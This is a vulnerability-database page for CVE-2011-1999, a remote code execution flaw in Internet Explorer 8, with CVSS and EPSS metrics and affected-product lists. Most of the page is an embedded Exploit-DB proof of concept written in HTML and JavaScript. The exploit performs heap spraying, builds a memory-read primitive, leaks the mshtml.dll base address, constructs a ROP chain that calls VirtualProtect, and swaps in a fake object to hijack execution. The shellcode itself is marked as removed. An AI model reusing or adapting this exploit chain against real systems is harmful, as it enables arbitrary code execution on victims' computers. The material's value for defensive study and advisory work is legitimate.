CVE-2011-1999 : Detail

CVE-2011-1999

88.17%V3
Network
2011-10-11
23h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer 8 does not properly allocate and access memory, which allows remote attackers to execute arbitrary code via vectors involving a "dereferenced memory address," aka "Select Element Remote Code Execution Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 36209

Publication date : 2011-10-10 22h00 +00:00
Author : Ivan Fratric
EDB Verified : Yes

source: https://www.securityfocus.com/bid/49964/info Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. <html> <head> </head> <body> <script type="text/javascript"> <!-- //originally, windows 7 compatible calc.exe shellcode from SkyLined var scode = "removed"; var newstack,newstackaddr; var fakeobj; var spray,spray2,selarray,readindex,readaddr,optarryaddr; var elms = new Array(); var optarray; var mshtmlbase; //option object that is to be corrupted var corruptedoption; var corruptedoptionaddr; var corruptaddr; function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } function inttostr(num) { return String.fromCharCode(num%65536,Math.floor(num/65536)); } function crash() { var o = new Option(); selarray[99].options.add(o,-0x20000000); } function readmem(addr) { if(addr < readaddr) alert("Error, can't read that address"); return strtoint(spray[readindex].substr((addr-readaddr)/2,2)); } function readmem2(addr,size) { if(addr < readaddr) alert("Error, can't read that address"); return spray[readindex].substr((addr-readaddr)/2,size/2); } function overwrite(addr) { try { var index = (addr-optarryaddr)/4 - 0x40000000; selarray[99].options.add(optarray.pop(),index); } catch(err) {} } function getreadaddr() { readaddr = 0; var indexarray = new Array(); var tmpaddr = 0; var i,index; index = readmem(tmpaddr); indexarray.push(index); while(1) { tmpaddr += 0x100000; index = readmem(tmpaddr); for(i=0;i<indexarray.length;i++) { if(indexarray[i]==index+1) { readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24; return 1; } else if(indexarray[i]==index-1) { readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24; return 1; } } indexarray.push(index); } } //leverages the vulnerability into memory disclosure function initread() { //overwrite something in a heap spray slide try { selarray[99].options.add(optarray.pop(),-100000000/4); } catch(err) {} //now find what and where exectly did we overwrite readindex = -1; var i; for(i=1;i<200;i++) { if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) { readindex = i; break; } } if(readindex == -1) { alert("Error overwriring first spray"); return 0; } var start=2,len=spray[readindex].length-2,mid; while(len>10) { mid = Math.round(len/2); mid = mid - mid%2; if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) { len = mid; } else { start = start+mid; len = len-mid; //if(spray[readindex].substr(start,mid) == spray[readindex-1].substr(start,mid)) alert("error"); } } for(i=start;i<(start+20);i=i+2) { if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) { break; } } //overwrite the string length try { selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1); } catch(err) {} if(spray[readindex].length == spray[readindex-1].length) alert("error overwriting string length"); //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24; getreadaddr(); optarryaddr = readaddr + 100000000 + i*2; return 1; } function trysploit() { //create some helper objects for(var i =0; i < 100; i++) { elms.push(document.createElement('div')); } //force the option cache to rebuild itself var tmp1 = selarray[99].options[70].text; //overwrite the CTreeNode pointer overwrite(corruptaddr); //read the address of the option object we overwrited with var optadr = readmem(corruptaddr); //delete the option object... selarray[99].options.remove(0); CollectGarbage(); //...and allocate some strings in its place for(var i = 0; i < elms.length; i++) { elms[i].className = fakeobj; } //verify we overwrote the deleted option object successfully if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0; alert("success, calc.exe should start once you close this message box"); //now do something with the corrupted option object corruptedoption.parentNode.click(); } function hs() { //first heap spray, nop slide + shellcode spray = new Array(200); var pattern = unescape("%u0C0C%u0C0C"); while(pattern.length<(0x100000/2)) pattern+=pattern; pattern = pattern.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray[i] = [inttostr(i)+pattern+scode].join(""); } //fill small gaps, we wan everything _behind_ our heap spray so that we can read it var asmall = new Array(10000); pattern = "aaaa"; while(pattern.length<500) pattern+=pattern; for(var i=0;i<10000;i++) { asmall[i]=[pattern+pattern].join(""); } //create some select and option elements selarray = new Array(100); for(var i=0;i<100;i++) { selarray[i] = document.createElement("select"); for(var j=0;j<100;j++) { var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); selarray[i].options.add(o,0); } } //create some extra option elements optarray = new Array(10000); for(var i=0;i<10000;i++) { optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); } //enable memory disclosure if(initread()==0) return; //force the option cache to rebuild itself var tmp1 = selarray[99].options[60].text; //get the address of some option element to be corrupted, also remove it from its select element, we don't want anything else messing with it corruptedoptionaddr = readmem(optarryaddr+60*4); corruptedoption = selarray[99].options[60]; selarray[99].options.remove(60); //get the base address of mshtml.dll based on the vtable address inside the option object mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0; alert("base address of mshtml.dll : " + mshtmlbase.toString(16)); //we'll overwrite the pointer to the CTreeNode object, compute its address corruptaddr = corruptedoptionaddr+0x14; //second heap-spray, this one will act as a stack (we'll exchange stack pointer with a pointer into this) spray2 = new Array(200); //some address that is likely to be inside the "stack" newstackaddr = optarryaddr+100000000; newstackaddr-=newstackaddr%0x1000; newstackaddr+=0x24; //assemble the "stack" so that it calls VirtualProtect on the firs shellcode and then jumps into it through return-oriented-programming newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F); while(newstack.length<(0x1000/2)) newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA"); newstack = newstack.substr(0,0x1000/2); while(newstack.length<(0x100000/2)) newstack+=newstack; newstack = newstack.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray2[i] = [newstack].join(""); } //constract a fake object which will replace a deleted option object (it has to be the same size) //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); //loop until we either achieve command execution or fail for(var i=0;i<100;i++) { trysploit(); } alert("Exploit failed, try again"); } hs(); --> </script> </body> </html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_vista >> Version -

Microsoft>>Windows_vista >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

References

http://www.securityfocus.com/bid/49964
Tags : vdb-entry, x_refsource_BID